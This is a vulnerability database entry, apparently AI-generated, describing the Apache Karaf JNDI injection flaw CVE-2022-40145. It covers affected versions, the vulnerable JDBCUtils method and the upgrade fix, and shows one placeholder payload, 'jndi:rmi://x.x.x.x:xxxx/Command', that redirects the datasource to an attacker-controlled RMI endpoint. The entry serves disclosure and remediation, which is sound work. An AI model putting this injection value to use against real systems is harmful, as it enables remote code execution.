
Cloud Vulnerability DB
A community-led vulnerabilities database
Apache Karaf, a modulith runtime supporting various frameworks and programming models, was found to contain a remote code execution vulnerability identified as CVE-2022-40145. The vulnerability was discovered by security researcher Xun Bai and disclosed on December 21, 2022. This security flaw affects all versions of Apache Karaf up to 4.4.1 and 4.3.7, involving potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL (Security Online, Apache Advisory).
The vulnerability exists in the jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource method, which uses InitialContext.lookup(jndiName) without proper filtering. An attacker can modify the configuration from options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName()); to options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command"); in JdbcLoginModuleTest#setup. The severity of this vulnerability is rated as Low according to the official advisory (Apache Advisory).
When successfully exploited, this vulnerability could allow remote attackers to execute arbitrary code on the affected systems when a configuration uses a JNDI LDAP data source URI and the attacker has control of the target LDAP server (Security Online).
The vulnerability can be exploited when an attacker has control of the target LDAP server and can manipulate the JDBC JNDI URL. The exploitation involves modifying the DATASOURCE configuration to point to a malicious JNDI RMI endpoint (Apache Advisory).
Apache Karaf users are advised to upgrade to versions 4.3.8 or 4.4.2 or later as soon as possible. Alternatively, users can implement proper path restrictions as a workaround. The fix has been implemented in revision commits 3819f48341 and 2a933445d1 (Apache Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."